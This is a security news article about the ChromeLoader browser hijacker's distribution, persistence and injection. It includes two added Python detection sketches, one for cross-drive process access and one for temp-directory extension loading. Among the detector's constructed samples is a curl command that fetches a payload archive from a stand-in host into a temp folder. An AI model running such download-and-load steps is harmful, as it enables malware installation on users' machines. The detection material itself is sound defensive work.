Beware a persistent and widespread browser hijacker capable of modifying browser settings and redirecting user traffic to advertisement sites. Security researchers are warning about an increase in ChromeLoader campaigns. The threat was first observed in early February, but is now going through a resurgence, Red Canary researchers warn.
A Look into ChromeLoader
ChromeLoader is a persistent browser hijacking malware that arrives as an ISO file and tricks users into executing it. Its purpose is to carry out malvertising campaigns. The hijacker is distributed on websites for cracked software, such as cracked video games and pirated movies and TV series. The threat could also be bundled into the installers of pirated programs.
It is classified as a suspicious browser extension that redirects traffic, but since it uses PowerShell to inject itself into the browser, it shouldn’t be underestimated.
“If applied to a higher-impact threat—such as a credential harvester or spyware—this PowerShell behavior could help malware gain an initial foothold and go undetected before performing more overtly malicious activity, like exfiltrating data from a user’s browser sessions,” the researchers warned.
How Is ChromeLoader Propagated?
The browser hijacker comes in the form of an ISO file, masqueraded as a torrent or pirated software. Places of distribution include pay-per-install and social media platforms. Once executed, the file is extracted and mounted as a drive on the compromised computer. The ISO file also contains an executable that drops ChromeLoader and a .NET wrapper for Windows Task Scheduler, used to gain persistence on the victim’s machine.
ChromeLoader also uses the so-called cross-process injection into svchost.exe. It is noteworthy that the injection is often used by legitimate applications but may be suspicious if the originating process is located on a virtual drive.
“It’s a good idea to keep an eye out for processes executing from file paths that don’t reference the default C: drive and that initiate a cross-process handle into a process that is on the C: drive. This will not only offer visibility into ChromeLoader activity, but also into the many worms that originate from removable drives and inject into C: drive processes, like explorer.exe, to propagate on a victim’s machine,” the researchers said.
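One way to turn that guidance into a concrete check, as an added example that is not code from the article or from Red Canary: the rule below flags cross-process access events whose source process runs from a volume other than C: (a mounted ISO, a removable drive, a network share) and whose target runs from C:. The event dictionaries, field names and sample paths are a constructed, simplified shape, not a real Sysmon or EDR schema, and the allowlist parameter is an assumption added so that a legitimate second system drive or tooling share does not generate noise.

```python
# Added example (not code from the article or from Red Canary): a detection
# sketch for the quoted guidance. It flags cross-process access events whose
# source process does not live on C: while the target process does. The event
# dictionaries are a constructed, simplified shape, not a real Sysmon/EDR schema.
import re
from typing import Dict, Iterable, List, Optional

DRIVE_RE = re.compile(r"^([A-Za-z]):\\")


def drive_letter(path: str) -> Optional[str]:
    """Return the upper-case drive letter of a Windows path, or None for
    UNC and relative paths (which also do not reference C:)."""
    m = DRIVE_RE.match(path)
    return m.group(1).upper() if m else None


def is_suspicious_access(event: Dict[str, str], allowlist: Iterable[str] = ()) -> bool:
    """True when a process that does not run from C: opens a handle into a
    process that does. Known-good non-C: locations can be excluded by prefix
    through the (assumed) allowlist."""
    if event.get("event") != "process_access":
        return False
    src = event.get("source_image", "")
    dst = event.get("target_image", "")
    if drive_letter(dst) != "C":
        return False            # target is not a C: drive process
    if drive_letter(src) == "C":
        return False            # source already lives on C:, nothing unusual
    if any(src.lower().startswith(p.lower()) for p in allowlist):
        return False            # known-good location on another volume
    return True


def find_suspicious(events: Iterable[Dict[str, str]],
                    allowlist: Iterable[str] = ()) -> List[Dict[str, str]]:
    allowlist = tuple(allowlist)
    return [e for e in events if is_suspicious_access(e, allowlist)]


# Constructed sample telemetry. E: stands in for a mounted ISO volume.
SAMPLE_EVENTS = [
    {"event": "process_access",
     "source_image": "E:\\Setup.exe",
     "target_image": "C:\\Windows\\System32\\svchost.exe"},
    {"event": "process_access",
     "source_image": "C:\\Program Files\\Vendor\\scanner.exe",
     "target_image": "C:\\Windows\\explorer.exe"},
    {"event": "process_access",
     "source_image": "D:\\Tools\\debugger.exe",
     "target_image": "C:\\Windows\\System32\\notepad.exe"},
    {"event": "process_access",
     "source_image": "\\\\fileserver\\share\\tool.exe",
     "target_image": "C:\\Windows\\explorer.exe"},
    {"event": "process_create",
     "source_image": "E:\\Setup.exe",
     "target_image": ""},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS, allowlist=("D:\\Tools\\",)):
        print("suspicious:", hit["source_image"], "->", hit["target_image"])
```

Run stand-alone, the script reports the ISO-resident `E:\Setup.exe` opening a handle into `svchost.exe` and the network-share tool opening `explorer.exe`, while the allowlisted `D:\Tools\` debugger and the C:-resident scanner are ignored. Because legitimate software on a second drive will also match, the allowlist (or an equivalent baseline of known installs) is what keeps the rule actionable.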
ChromeLoader macOS Version Also Available
The macOS version uses the same distribution technique, with the slight difference that it deploys “baited social media posts with QR codes or links”. These redirect users to malicious pay-per-install download sites. The macOS version uses a DMG file rather than an ISO file. This file contains an installer script that drops payloads for either Chrome or Safari. Once executed, the installer script invokes cURL to retrieve a ZIP file containing the malicious browser extension, which is unzipped into the /private/var/tmp directory. The final stage is launching the browser with command-line options that load the malicious extension.
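The final stage on macOS leaves a visible trace in process telemetry: a browser started with an extension-loading argument that points into a temporary directory. As an added example that is not code from the article or from Red Canary, the check below inspects a browser launch's argv for Chromium's `--load-extension=` flag (a real Chromium switch; the page itself does not name the exact option) and reports any extension directory under /private/var/tmp or /private/tmp, folding the `/var` and `/tmp` symlink spellings so both forms match. The argv lists are constructed samples, and the browser-name set is an assumption.

```python
# Added example (not code from the article or from Red Canary): flag browser
# launches whose --load-extension= value points into a macOS temp directory.
# argv lists below are constructed; BROWSER_BASENAMES is an assumption.
import os
from typing import List

TMP_ROOTS = ("/private/var/tmp", "/private/tmp")
BROWSER_BASENAMES = {"Google Chrome", "Google Chrome Canary", "Chromium"}


def normalize(path: str) -> str:
    """Collapse the macOS /var and /tmp symlinks onto their /private targets
    so that /var/tmp/x and /private/var/tmp/x compare equal."""
    p = os.path.normpath(path)
    if p == "/var" or p.startswith("/var/"):
        p = "/private" + p
    elif p == "/tmp" or p.startswith("/tmp/"):
        p = "/private" + p
    return p


def extension_dirs(argv: List[str]) -> List[str]:
    """Extract every directory passed via --load-extension=a,b,c."""
    dirs: List[str] = []
    for arg in argv[1:]:
        if arg.startswith("--load-extension="):
            dirs.extend(d for d in arg.split("=", 1)[1].split(",") if d)
    return [normalize(d) for d in dirs]


def is_browser(argv: List[str]) -> bool:
    return bool(argv) and os.path.basename(argv[0]) in BROWSER_BASENAMES


def in_tmp(path: str) -> bool:
    return any(path == root or path.startswith(root + "/") for root in TMP_ROOTS)


def suspicious_launch(argv: List[str]) -> List[str]:
    """Return the temp-resident extension directories a browser launch loads;
    an empty list means nothing to report for this process."""
    if not is_browser(argv):
        return []
    return [d for d in extension_dirs(argv) if in_tmp(d)]


CHROME = "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"

# Constructed sample process launches.
SAMPLE_LAUNCHES = [
    [CHROME, "--load-extension=/private/var/tmp/ext123", "--no-first-run"],
    [CHROME, "--load-extension=/var/tmp/ext123,/Users/dev/myext"],
    [CHROME, "--load-extension=/Users/dev/myext"],
    ["/usr/bin/curl", "-o", "/private/var/tmp/payload.zip", "https://example.invalid/x"],
]

if __name__ == "__main__":
    for argv in SAMPLE_LAUNCHES:
        hits = suspicious_launch(argv)
        if hits:
            print("browser loading extension from temp:", hits)
```

The first two launches are reported (the second only for its temp-resident directory, not the developer's own extension under `/Users`), the third is a normal developer workflow, and the cURL download is not a browser launch at all. Pairing this with the preceding steps the article describes (a cURL fetch and an unzip into /private/var/tmp shortly before the browser start) gives a tighter sequence than any single event.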